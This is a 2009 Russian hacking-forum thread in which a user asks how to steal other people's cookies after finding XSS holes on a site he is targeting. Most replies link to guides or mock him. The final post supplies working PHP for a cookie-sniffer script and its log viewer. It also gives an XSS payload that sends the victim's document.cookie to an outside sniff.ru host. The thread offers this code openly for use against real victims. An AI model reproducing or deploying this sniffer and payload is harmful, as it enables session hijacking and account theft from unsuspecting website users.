ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Куки
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Куки
  #1  
Старый 12.07.2009, 16:58
Аватар для Badak
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
Провел на форуме:
301675

Репутация: 27
Отправить сообщение для Badak с помощью ICQ
По умолчанию Куки
Все доброго времени суток.Ребята,подскажите как мне чужие куки забирать.Заранее спасибо
 
Ответить с цитированием

  #2  
Старый 12.07.2009, 17:19
Аватар для Badak
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
Провел на форуме:
301675

Репутация: 27
Отправить сообщение для Badak с помощью ICQ
По умолчанию
Я нашел XSS,что дальше?:Р
 
Ответить с цитированием

  #3  
Старый 12.07.2009, 17:24
Аватар для Inotsee
Inotsee
Новичок
Регистрация: 24.06.2009
Сообщений: 18
Провел на форуме:
536817

Репутация: 3
По умолчанию
Издеваешься? Знаешь как найти XSS и не знаешь как запрос составить? Составь запрос, дай жертве ссылку и лови его куки на сниффере.
 
Ответить с цитированием

  #4  
Старый 12.07.2009, 17:26
Аватар для Badak
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
Провел на форуме:
301675

Репутация: 27
Отправить сообщение для Badak с помощью ICQ
По умолчанию
Я не издеваюсь))Я знаю как XSS найти уже на нужном сайте нашел 23,а как запрос составить и что дальше делать понятия не имею,но хочу научиться
 
Ответить с цитированием

  #5  
Старый 12.07.2009, 17:30
Аватар для br3k
br3k
Участник форума
Регистрация: 19.09.2007
Сообщений: 163
Провел на форуме:
2825788

Репутация: 327
Отправить сообщение для br3k с помощью ICQ
По умолчанию
XSS
_ttp://hackzona.ru/hz.php?name=News&file=article&sid=5005
_ttp://www.cgisecurity.com/articles/dx27.html
_ttp://ha.ckers.org/xss.html
_ttp://forum.antichat.ru/thread20140.html
_ttp://forum.antichat.ru/thread8038.html
_ttp://forum.antichat.ru/thread7124-XSS+FAQ.html
К изучению.
 
Ответить с цитированием

  #6  
Старый 12.07.2009, 17:32
Аватар для Aikaram
Aikaram
Постоянный
Регистрация: 08.06.2009
Сообщений: 509
Провел на форуме:
3133559

Репутация: 766


Отправить сообщение для Aikaram с помощью ICQ Отправить сообщение для Aikaram с помощью AIM Отправить сообщение для Aikaram с помощью Yahoo
По умолчанию
иди лучше книжки почитай, которые на лето задали. а то все куки да куки.
 
Ответить с цитированием

  #7  
Старый 12.07.2009, 17:35
Аватар для Badak
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
Провел на форуме:
301675

Репутация: 27
Отправить сообщение для Badak с помощью ICQ
По умолчанию
Тебе выдали ты иди и читай
 
Ответить с цитированием

  #8  
Старый 12.07.2009, 18:40
Аватар для Badak
Badak
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
Провел на форуме:
301675

Репутация: 27
Отправить сообщение для Badak с помощью ICQ
По умолчанию
Может мне кто-то ответить?!Что делать после того как нашел XSS?
 
Ответить с цитированием

  #9  
Старый 12.07.2009, 18:43
Аватар для Flegmatique
Flegmatique
Banned
Регистрация: 06.07.2009
Сообщений: 29
Провел на форуме:
191165

Репутация: 43
По умолчанию
ссылки тебе дали, читай и действуй
жевать за тебя никто не будет
 
Ответить с цитированием

  #10  
Старый 12.07.2009, 19:18
Аватар для Failure
Failure
Участник форума
Регистрация: 21.09.2008
Сообщений: 148
Провел на форуме:
678893

Репутация: 102
По умолчанию
sniff.php
PHP код:
<?php
$ip=$_SERVER["REMOTE_ADDR"];
$ref=$_SERVER["HTTP_REFERER"];
$ua=$_SERVER["HTTP_USER_AGENT"];
$q=$_SERVER["QUERY_STRING"];
if($ref == "") {
$str "<b>$ip</b>  | Нет HTTP реферера | <br>Юзает: $ua |<br>QUERY_STRING: $q |<br>======================================================================================================";
}
else {$str "<b>$ip</b>  | Пришел с :  <a href=$ref>$ref</a> | <br>Юзает: $ua |<br>QUERY_STRING:   $q   |<br>======================================================================================================";}

$file=fopen("log.txt","a+");
fwrite($file,"$str<br>");
fclose($file);
?>
<img src="http://img1.liveinternet.ru/images/attach/b/3/28/251/28251827_novoe.jpg">
log.php:
PHP код:
<?php
echo "<html>
<body>
<meta http-equiv; charset=windows-1251>
<title>WEB Sniffer</title>
<body bgcolor=black style=color:red>
<h1>WEB SNIFFER</h1>
<input type=submit value='Обновить' onClick=javascript:window.location='log.php'>
</form>
<br><br><br>
======================================================================================================<br>";
if(file_exists("log.txt"))
require "log.txt";
echo "<br></body></html>";
?>
http://site.ru/folder/[XSS]="><script>window.location='http://sniff.ru/sniff.php?'+document.cookie;</script>
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как подменить куки F.A.Q [R3x] Форумы 4 09.03.2007 12:54
Phpbb2 0.16 можно ли через куки получить доступ к админке? HAMANN Форумы 3 20.11.2006 01:25
Не получаеться подменить куки для форума PhpBB 2.0.17 Astro Форумы 10 21.02.2006 23:01
Аудит аутентификации на Web-сайтах. Часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:20
Проверка надежности Web-приложений. Часть Третья k00p3r Чужие Статьи 0 13.06.2005 11:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ